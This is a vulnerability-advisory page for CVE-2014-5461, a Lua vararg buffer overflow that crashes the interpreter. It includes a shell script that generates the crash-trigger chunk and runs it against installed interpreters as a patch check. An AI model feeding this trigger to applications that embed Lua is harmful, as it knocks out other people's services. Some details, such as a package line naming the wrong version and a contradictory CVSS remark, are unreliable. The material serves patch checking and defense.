CVE-2014-5461: Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119) in lua5.1

Severity: 5.0 MEDIUM (NVD)
EPSS: 21.6% (top 4.26%)
CISA KEV: not in KEV
Exploit: no known exploits
Timeline: published Sep 4; latest update Dec 29

Description

Buffer overflow in the vararg handling in ldo.c in Lua 5.1 through 5.2.x before 5.2.3 allows context-dependent attackers to cause a denial of service (crash) by calling a vararg function (one declared with `...`) that has a large number of fixed parameters with fewer arguments than it declares. "Context-dependent" means the attacker needs the target to run Lua code of their choosing, for example a script or chunk fed to an application that embeds the interpreter; the recorded impact is a crash of that host process (availability only, per the CVSS vector below).
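To make the trigger concrete and check a host, here is an added shell example (not code from the advisory, from Lua, or from any distribution): it generates the Lua chunk the description refers to, a vararg function with many fixed parameters called with no arguments, classifies a `lua -v` banner against the upstream affected range, and runs the chunk under whichever interpreters are installed. The binary names lua5.1, lua5.2 and lua, the parameter and local counts, and the function name f are my assumptions.

```shell
#!/bin/sh
# Added example for CVE-2014-5461 (not code from the advisory, Lua or a
# distribution). Builds the crash trigger described in the advisory text,
# classifies a Lua version banner against the upstream affected range, and
# runs the trigger under installed interpreters. Binary names and counts
# are assumptions.

# gen_trigger NPARAMS NLOCALS: print a Lua chunk declaring a vararg function
# f with NPARAMS fixed parameters and NLOCALS locals, then calling f() with
# no arguments. Lua permits at most 200 locals per function, parameters
# included, so keep NPARAMS + NLOCALS <= 200. On an unfixed interpreter the
# frame ends up beyond the stack space that was checked for it (from 5.2.3
# on, ldo.c re-checks the stack after the fixed arguments have been moved).
gen_trigger() {
  nparams=$1; nlocals=$2
  params=""; i=1
  while [ "$i" -le "$nparams" ]; do
    params="${params}p${i}, "
    i=$((i + 1))
  done
  locals=""; i=1
  while [ "$i" -le "$nlocals" ]; do
    locals="${locals}${locals:+, }a${i}"
    i=$((i + 1))
  done
  if [ "$nlocals" -gt 0 ]; then body="  local ${locals}"; else body="  return"; fi
  printf 'function f(%s...)\n%s\nend\nf()\n' "$params" "$body"
}

# lua_affected VERSION: exit 0 when VERSION (a bare "5.2.2" or a full
# "Lua 5.2.2  Copyright ..." banner) is in the upstream affected range,
# 5.1.x or 5.2.0 through 5.2.2; exit 1 otherwise; exit 2 if nothing parses.
lua_affected() {
  ver=$(printf '%s' "$1" |
    sed -n 's/^[^0-9]*\([0-9][0-9]*\)\.\([0-9][0-9]*\)\.\{0,1\}\([0-9]*\).*/\1 \2 \3/p')
  [ -n "$ver" ] || return 2
  set -- $ver
  major=$1; minor=$2; patch=${3:-0}
  [ "$major" -eq 5 ] || return 1
  case "$minor" in
    1) return 0 ;;
    2) [ "$patch" -lt 3 ] ;;
    *) return 1 ;;
  esac
}

# check_installed: for each candidate binary that exists, report the version
# classification and the exit status of running the trigger under it
# (0 = survived; 128 + signal number, e.g. 139 for SIGSEGV, = crashed).
check_installed() {
  tmp=$(mktemp) || return 1
  gen_trigger 100 90 > "$tmp"
  for bin in lua5.1 lua5.2 lua; do          # assumed binary names
    command -v "$bin" > /dev/null 2>&1 || continue
    banner=$("$bin" -v 2>&1)                # lua5.1 prints its banner to stderr
    if lua_affected "$banner"; then verdict="version in affected upstream range"
    else verdict="version outside affected range"; fi
    rc=0; "$bin" "$tmp" > /dev/null 2>&1 || rc=$?
    printf '%s: %s; trigger exit status %d\n' "$bin" "$verdict" "$rc"
  done
  rm -f "$tmp"
}

check_installed
```

Distribution packages that backport the fix keep the upstream version string (Debian's fixed lua5.1 still reports 5.1.5), so the banner check only identifies unpatched upstream builds; the behavioural run is what settles it. A vulnerable interpreter normally dies with SIGSEGV or an allocator abort, and a build with AddressSanitizer reports a heap-buffer-overflow; a fixed one prints nothing and exits 0.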

CVSS vector

CVSS v2 vector: AV:N/AC:L/Au:N/C:N/I:N/A:P (Exploitability: 10.0 | Impact: 2.9; the Au:N metric, dropped in the rendered vector, is implied by the 10.0 exploitability subscore)

Affected Packages (5)

debian/lua5.1: < lua5.1 5.1.5-7 (bookworm)
debian/lua5.2: < lua5.1 5.1.5-7 (bookworm)
NVD lua/lua: 9 versions (+8)
NVD mageia/mageia: 3.0, 4.0 (+1)
NVD opensuse/opensuse: 12.3, 13.1 (+1)

Also affects: Debian Linux 7.0, Ubuntu Linux 12.04, 14.04

Patches

Vulnerability Details (2)

GHSA: GHSA-v3hh-4h88-w4mr: Buffer overflow in the vararg functions in ldo (2022-05-14)
OSV: CVE-2014-5461: Buffer overflow in the vararg functions in ldo (2014-09-04)

Vendor Advisories (3)

Ubuntu: Lua vulnerability (2014-09-03)
Debian: CVE-2014-5461: lua5.1 - Buffer overflow in the vararg functions in ldo.c in Lua 5.1 through 5.2.x before... (2014)
Red Hat: lua: overflow flaw in vararg functions (2013-04-17)

Research Papers (2)

arXiv: One Bad Apple Spoils the Barrel: Understanding the Security Risks Introduced by Third-Party Components in IoT Firmware (2022-12-29)
arXiv: Threat Assessment in Machine Learning based Systems (2022-06-30)

Community (1)

Bugzilla: CVE-2014-5461 lua: overflow flaw in vararg functions (2014-08-21)